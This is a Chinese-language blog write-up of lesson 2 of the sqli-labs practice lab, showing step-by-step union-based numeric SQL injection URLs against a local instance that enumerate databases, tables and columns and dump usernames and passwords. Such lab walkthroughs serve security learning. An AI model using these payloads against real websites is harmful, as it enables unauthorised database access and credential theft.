zoukankan      html  css  js  c++  java
  • sqli-libs(2)

    Lesson2:数字型注入我们先来测试一下

    http://127.0.0.1/sql1/Less-2/?id=1%20and%201=1

    发现未报错 这里知道我们的数字型注入是不需要 进行单引号闭合的

    这里我们构造语句进行爆库名 因为之前知道这里是3列 所以 我们进行时就不用order by了  这里要注意id的参数为-1

    http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20database())

    接下来我们进行对数据库名的查看

    http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)

    接下来是对表名的爆破

    http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)

    这里要注意 最后的库名称=  的函数是 table_schema= 这个函数 我开始一直写的 schema_name  一直错 哈哈

    得知表名后 我们可以查看关键信息的表 比如uers我觉得就很关键

    http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)

    这里看见username和password应该是我们要数据 所以 开始爆破字段吧

    http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,group_concat(id,0x3a,username,0x3a,password)%20from%20security.users

    ok 到这里我们就得到关键数据 呐 切记 学习不能只求进度 懂了你才能学到知识

    少就是多 慢就是快

  • 相关阅读:
    C++学习9 this指针详解
    福建省第八届 Triangles
    UVA 11584 Partitioning by Palindromes
    POJ 2752 Seek the Name, Seek the Fame
    UVA 11437 Triangle Fun
    UVA 11488 Hyper Prefix Sets (字典树)
    HDU 2988 Dark roads(kruskal模板题)
    HDU 1385 Minimum Transport Cost
    HDU 2112 HDU Today
    HDU 1548 A strange lift(最短路&&bfs)
  • 原文地址:https://www.cnblogs.com/-zhong/p/10879388.html
Copyright © 2011-2022 走看看